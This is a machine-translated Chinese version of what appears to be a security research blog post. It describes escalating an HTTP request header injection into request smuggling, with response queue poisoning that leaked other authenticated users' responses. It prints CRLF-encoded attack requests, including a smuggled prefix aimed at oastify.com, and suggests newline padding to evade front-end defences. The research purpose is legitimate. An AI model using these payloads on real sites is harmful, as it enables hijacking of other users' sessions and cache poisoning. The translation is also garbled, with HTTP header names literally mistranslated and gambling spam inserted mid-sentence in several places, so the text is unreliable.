发布:2022年9月22日在14:00 UTC
更新:2022年9月26日在14:26 UTC
HTTP标头注射通常被低估,并被错误分类为中等严重性的缺陷XSS或更糟糕的是,开放重定向。在这篇文章中,我将分享一种简单的技术,我用来采用标头注射脆弱性,使其至关重要,并赚取12,500美元的赏金。
该技术适用于前端服务器上的请求标头注入,也适用于后端服务器上的响应标头注入。
这一切始于蓝色,一个陌生人向我发送了基于路径的请求标题注入,并问我是否有任何剥削想法。漏洞是在一个主要的高流量站点上,具有关键功能,我们将其称为“ redacted.net”:
得到 /%20http/1.1%0D%0A主持人:%20删除%0D%0A%0D%0Ahttp/1.1
主机:redacted.net
http/1.1 200好
得到 /%20http/1.1%0D%0ANotHost:%20删除%0D%0A%0D%0Ahttp/1.1
主机:redacted.net
http/1.1 400不良要求
我通常不会接触过这样的电子邮件,因为记者确实被卡住了,因为它确实无法探索,而且我没有任何技巧可以提供帮助。但是,我长期怀疑可能可以将标头注射漏洞升级到请求走私。此外,Target网站还在一个因竞beplay体育能用吗争性赏金支出而闻名的Bug Bounty计划下,记者 -Xorb- 如果我能提供帮助,同意进行50/50的赏金拆分。
这个概念很简单 - 您可以通过几个简单的步骤将请求标头注入转换为更严重的HTTP DESYNC。
首先,确定注射的位置,并添加任何必要的东西以干净退出上下文:
得到 /%20http/1.1%0D%0A%0D%0Ahttp/1.1
http/1.1 400不良要求
连接:关闭
然后注入必需的标头,以确保后端在响应初始请求后保持连接的打开状态:
得到 /%20http/1.1%0D%0A主持人:%20删除%0D%0A联系:%20活着%0D%0A%0D%0Ahttp/1.1
http/1.1 200好
连接:保持活力
在这一点上,我们可以在我们控制的控制下完全指定第二个请求,因此我们准备了经典请求走私攻击。唯一的重要区别是,我们需要考虑到注射后附加其他标头/车身的服务器。这是交叉用户开发的众多选择中的两个。
指定恶意前缀毒害下一个用户的请求或网络缓存:beplay体育能用吗
得到 /%20http/1.1%0D%0A主持人:%20删除%0D%0A联系:%20活着%0D%0A%0D%0A得到%20/redirplz%20http/1.1%0D%0A主持人:%20oastify.com%0D%0A%0D%0A内容长度:%2050%0D%0A%0D%0Ahttp/1.1
或制定我们的前缀与后垃圾垃圾结合,并创建一个完整的第二请求,以触发响应队列中毒。
得到 /%20http/1.1%0D%0A主持人:%20删除%0D%0A联系:%20活着%0D%0A%0D%0A得到%20/%20http/1.1%0D%0Afoo:%20BAR HTTP/1.1
我选择了后一种选项,该选项成功地导致我间歇性地收到针对其他身份验证的用户的响应。我有一个漂亮的屏幕截图,但可悲的是,我无法获得命名目标的许可。
这足以证明对目标的关键影响,目标在24小时内对其进行了修补,并获得了12,500美元的赏金。
如果您遇到自己应用此技术的问题,这两个密切相关的帖子可能很有用:
如我们所见,将请求标头注入升级为DESANC非常容易。有时,升级响应标头注入同样简单。但是,其他时候它神秘地失败了。我最近发现了一种防御机制,我认为这可以解释这一点,并暗示了可能的解决方案。
当Web浏beplay体育能用吗览器在响应中读取响应时,如果它们遇到的数据比内容长度为标题中承诺的服务器更多,则它们会截断响应并关闭连接。我称之为堆叠响应问题,发现它使剥削客户端的DESANC漏洞变得更加严重,但并非不可能。
我现在怀疑一些主要的前端服务器具有类似的机制,这有两个安全性:
如果您试图通过响应标头注射失败导致DESYNC,则可能遇到了这种机制。要绕过它,您需要延迟注入的响应,以使前端的超阅读看不到它。
一种可能的方法是注入大量新线,这些新线通常在不触发请求/响应处理的情况下被服务器消耗。
最终,这方面需要进一步的研究。如果您在错误赏金计划上遇到此挑战并陷入困境,我很高兴看看我能提供帮助。我还应该提到,如果您发现标题注入的网站没有前端,那么这些技beplay体育能用吗术无法正常工作,但是您仍然可以实现客户端的DESYNC。
我怀疑这些技术曾经是众所周知的,但被遗忘了HTTP请求走私,这解释了为什么有些人将响应标题注射称为“响应分裂”,即使它们实际上从未真正分配响应。要更深入地探索被遗忘的安全知识现象,请查看狩猎回避脆弱性。
我希望这些技术对您有用,我们会喜欢听到如果您找到成功的话。